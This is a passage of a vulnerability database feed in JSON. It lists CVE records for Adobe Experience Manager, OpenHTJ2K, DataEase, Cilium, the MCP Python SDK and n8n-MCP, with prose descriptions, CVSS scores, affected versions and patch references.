LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N","baseScore":9.6,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":5.8}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T04:00:16.843850Z","id":"CVE-2026-48359","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-611"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-51807","sourceIdentifier":"cve@mitre.org","published":"2026-07-14T23:17:29.843","lastModified":"2026-07-17T16:17:15.513","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Heap-based out-of-bounds write in j2k_precinct_subband::parse_packet_header() in OpenHTJ2K versions 0.18.3 and earlier (fixed in v0.18.4) caused by missing bounds validation before coding-pass lengths are written to j2k_codeblock::pass_length[128]. A crafted JPEG 2000 codestream containing malformed PPM packet headers can trigger a heap-based out-of-bounds write in j2k_precinct_subband::parse_packet_header() in source/core/coding/coding_units.cpp due to missing bounds validation for the j2k_codeblock::pass_length[128] array which can lead to heap corruption and process termination."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T14:08:13.103708Z","id":"CVE-2026-51807","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-121"}]}],"references":[{"url":"https://github.com/osamu620/OpenHTJ2K/blob/main/CHANGELOG","source":"cve@mitre.org"},{"url":"https://github.com/osamu620/OpenHTJ2K/commit/0778b93","source":"cve@mitre.org"},{"url":"https://github.com/osamu620/OpenHTJ2K/compare/0778b93...v0.18.4","source":"cve@mitre.org"},{"url":"https://github.com/osamu620/OpenHTJ2K/releases","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-45320","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T20:17:03.387","lastModified":"2026-07-17T20:17:16.993","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"DataEase is an open source data visualization and analysis tool. Prior to 2.10.23, DataEase dashboard SQL variables such as ${deptId} are processed by SqlparserUtils.transFilter(), whose final branch returns raw user input for non-in and non-between operators before SubstitutedSql.replace(\"${var}\", value) splices it into dashboard SQL, allowing authenticated users who can view a dashboard to inject SQL against integrated datasources. This issue is fixed in version 2.10.23"}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"dataease","product":"dataease","versions":[{"version":"< 2.10.23","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:06:04.167380Z","id":"CVE-2026-45320","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/dataease/dataease/commit/163d510c6935a4010727392f5a680a7dc15abb13","source":"security-advisories@github.com"},{"url":"https://github.com/dataease/dataease/releases/tag/v2.10.23","source":"security-advisories@github.com"},{"url":"https://github.com/dataease/dataease/security/advisories/GHSA-8vp9-9hx4-6458","source":"security-advisories@github.com"},{"url":"https://github.com/dataease/dataease/security/advisories/GHSA-8vp9-9hx4-6458","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-46684","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T20:17:05.317","lastModified":"2026-07-17T19:17:15.033","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"DataEase is an open source data visualization and analysis tool. Prior to 2.10.23, DataEase enterprise token handling can let TokenFilter#doFilter() pass X-DE-TOKEN values to TokenUtils.validate(), which checks only token presence and length before userBOByToken(token) uses JWT.decode() without signature verification, allowing forged tokens with chosen uid and oid values to be accepted when licenseValid=true. This issue is fixed in version 2.10.23."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"dataease","product":"dataease","versions":[{"version":"< 2.10.23","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":9.5,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T18:18:24.365728Z","id":"CVE-2026-46684","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-347"}]}],"references":[{"url":"https://github.com/dataease/dataease/commit/3efda9d29c0df4300d43bb7874638e03060c3e2d","source":"security-advisories@github.com"},{"url":"https://github.com/dataease/dataease/releases/tag/v2.10.23","source":"security-advisories@github.com"},{"url":"https://github.com/dataease/dataease/security/advisories/GHSA-gp6v-f7mm-458v","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49445","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T20:17:10.453","lastModified":"2026-07-17T17:50:17.050","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Cilium is a networking, observability, and security solution. Prior to 1.17.14, 1.18.8, and 1.19.2, when Cilium L7 functionality is enabled, the embedded or standalone Envoy instance creates a world-accessible admin.sock on cluster nodes, allowing a local attacker to access Envoy admin endpoints, expose TLS secrets, disrupt cluster traffic, or terminate Envoy. This issue is fixed in versions 1.17.14, 1.18.8, and 1.19.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"cilium","product":"cilium","versions":[{"version":"< 1.17.14","status":"affected"},{"version":">= 1.18.0, < 1.18.8","status":"affected"},{"version":">= 1.19.0, < 1.19.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:H","baseScore":9.2,"baseSeverity":"CRITICAL","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"HIGH"},"exploitabilityScore":2.5,"impactScore":6.0},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.0,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T14:59:40.745501Z","id":"CVE-2026-49445","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-732"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*","versionEndExcluding":"1.17.14","matchCriteriaId":"1544DC73-F250-4536-B6EB-DADBA95C83EC"},{"vulnerable":true,"criteria":"cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*","versionStartIncluding":"1.18.0","versionEndExcluding":"1.18.8","matchCriteriaId":"7695E23A-4AF0-44E0-8282-0E4435451C9C"},{"vulnerable":true,"criteria":"cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*","versionStartIncluding":"1.19.0","versionEndExcluding":"1.19.2","matchCriteriaId":"3D2F4891-29A2-4B8F-BE6E-900EB5DDCC0A"}]}]}],"references":[{"url":"https://github.com/cilium/cilium/commit/7bfbdd5c1be83d6c9ba3e089b4c804b6603505b6","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/pull/44512","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/releases/tag/v1.17.14","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/cilium/cilium/releases/tag/v1.18.8","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/cilium/cilium/releases/tag/v1.19.2","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/cilium/cilium/security/advisories/GHSA-3fcv-jvfp-m4q9","source":"security-advisories@github.com","tags":["Patch","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-52869","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T20:17:38.427","lastModified":"2026-07-17T18:06:50.957","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The MCP Python SDK, called mcp on PyPI, is a Python implementation of the Model Context Protocol (MCP). Prior to 1.27.2, the SSE and stateful Streamable HTTP transports mcp.server.sse.SseServerTransport and mcp.server.streamable_http_manager.StreamableHTTPSessionManager route requests to existing sessions using only the session_id query parameter or Mcp-Session-Id header without verifying the authenticated principal that created the session, allowing a different bearer-token-authenticated client with a known session ID to inject JSON-RPC messages into that session. This issue is fixed in version 1.27.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"modelcontextprotocol","product":"python-sdk","versions":[{"version":"< 1.27.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":1.6,"impactScore":5.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:00:22.816039Z","id":"CVE-2026-52869","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:lfprojects:mcp_python_sdk:*:*:*:*:*:*:*:*","versionEndExcluding":"1.27.2","matchCriteriaId":"72E45D33-DB09-44B8-9007-066026CF9C2C"}]}]}],"references":[{"url":"https://github.com/modelcontextprotocol/python-sdk/commit/1abcca2408a6b50e10ec601181f63f9978705c00","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/commit/ce267b6fc515dc4efc1dc70b6975b16ff0feef0a","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/pull/2690","source":"security-advisories@github.com","tags":["Issue Tracking","Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/pull/2719","source":"security-advisories@github.com","tags":["Issue Tracking","Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/releases/tag/v1.27.2","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/security/advisories/GHSA-jpw9-pfvf-9f58","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-52870","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T20:17:38.577","lastModified":"2026-07-17T18:07:07.873","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The MCP Python SDK, called mcp on PyPI, is a Python implementation of the Model Context Protocol (MCP). From 1.23.0 until 1.27.2, default handlers installed by server.experimental.enable_tasks() for tasks/list, tasks/get, tasks/result, and tasks/cancel operate only on task identifiers without recording the session that created each task, allowing any connected client to enumerate, read results from, consume messages for, or cancel other clients' tasks. This issue is fixed in version 1.27.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"modelcontextprotocol","product":"python-sdk","versions":[{"version":">= 1.23.0, < 1.27.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L","baseScore":7.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":4.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:01:33.294977Z","id":"CVE-2026-52870","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:lfprojects:mcp_python_sdk:*:*:*:*:*:*:*:*","versionStartIncluding":"1.23.0","versionEndExcluding":"1.27.2","matchCriteriaId":"788DA6BA-F84C-4AFA-B31F-7096732011C8"}]}]}],"references":[{"url":"https://github.com/modelcontextprotocol/python-sdk/commit/62137874ff26dd74d2fea80ff528a7fd9ca7a5e7","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/pull/2720","source":"security-advisories@github.com","tags":["Issue Tracking","Patch"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/releases/tag/v1.27.2","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/modelcontextprotocol/python-sdk/security/advisories/GHSA-hvrp-rf83-w775","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-56742","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T20:17:51.850","lastModified":"2026-07-17T17:48:48.260","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Cilium is a networking, observability, and security solution. Prior to 1.17.17, 1.18.11, and 1.19.5, Cilium clusters using Gateway API allow users with permissions to create or update namespaced HTTPRoutes to mirror HTTP traffic to any Service in any namespace, bypassing the ReferenceGrant authorization mechanism. Gateway API functionality is disabled by default. This issue is fixed in versions 1.17.17, 1.18.11, and 1.19.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"cilium","product":"cilium","versions":[{"version":"< 1.17.17","status":"affected"},{"version":">= 1.18.0, < 1.18.11","status":"affected"},{"version":">= 1.19.0, < 1.19.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.7,"impactScore":3.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L","baseScore":8.9,"baseSeverity":"HIGH","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":2.3,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T12:56:22.128191Z","id":"CVE-2026-56742","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*","versionEndExcluding":"1.17.17","matchCriteriaId":"18200066-7BAA-4F9F-BD35-4C0A722FD570"},{"vulnerable":true,"criteria":"cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*","versionStartIncluding":"1.18.0","versionEndExcluding":"1.18.11","matchCriteriaId":"14989CFB-167A-4E33-A767-CFCCB1B90EA0"},{"vulnerable":true,"criteria":"cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*","versionStartIncluding":"1.19.0","versionEndExcluding":"1.19.5","matchCriteriaId":"0170388B-1CC3-4015-BD0D-CBA127A52679"}]}]}],"references":[{"url":"https://github.com/cilium/cilium/commit/7422068aff67ac77c7dcc57aa5b9240c91333deb","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/commit/e0b1cef513ff910323f3743e9f3e3d86721e4857","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/commit/f23929cff682d6ed0dc158070812cb302fc0032b","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/commit/fd47963ea394d5e8fa4a88c40a79063430c512ca","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/releases/tag/v1.17.17","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/cilium/cilium/releases/tag/v1.18.11","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/cilium/cilium/releases/tag/v1.19.5","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/cilium/cilium/security/advisories/GHSA-w7c2-w76w-5hmj","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-56743","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T20:17:51.987","lastModified":"2026-07-17T17:29:02.113","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Cilium is a networking, observability, and security solution. From 1.19.0 to 1.19.4, standard Kubernetes NetworkPolicy specifications using CIDR-based ipBlock rules without pod or namespace selectors erroneously generate a wildcard namespace allow rule when Cilium is configured with a custom clusterName rather than the default any value. The parser incorrectly instantiates a pod selector on selectorless peer definitions, allowing traffic from other workloads in the same namespace as the subject of the policy. This issue is fixed in version 1.19.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"cilium","product":"cilium","versions":[{"version":">= 1.19.0, < 1.19.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T13:02:42.889041Z","id":"CVE-2026-56743","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*","versionStartIncluding":"1.19.0","versionEndExcluding":"1.19.5","matchCriteriaId":"0170388B-1CC3-4015-BD0D-CBA127A52679"}]}]}],"references":[{"url":"https://github.com/cilium/cilium/commit/1c84ae3b58a7cd54f7ee355e6c524c82f620eae8","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/commit/bacea640404c0805c23515353dc1681c5bf35171","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/pull/46305","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/pull/46456","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/cilium/cilium/releases/tag/v1.19.5","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/cilium/cilium/security/advisories/GHSA-fm8w-2m5w-9j7r","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-55608","sourceIdentifier":"security-advisories@github.com","published":"2026-07-15T21:16:55.307","lastModified":"2026-07-17T17:11:08.290","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.57.4, multi-tenant HTTP mode with ENABLE_MULTI_TENANT=true could allow an authenticated tenant to access default-scope workflow_versions backups instead of being confined to the tenant scope, exposing or deleting workflow-version backups from prior single-tenant deployments or migrations. This issue is fixed in version 2.57.4."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"czlonkowski","product":"n8n-mcp","versions":[{"version":"< 2.57.4","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":4.2,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":2.5},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:32:17.752098Z","id":"CVE-2026-55608","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA 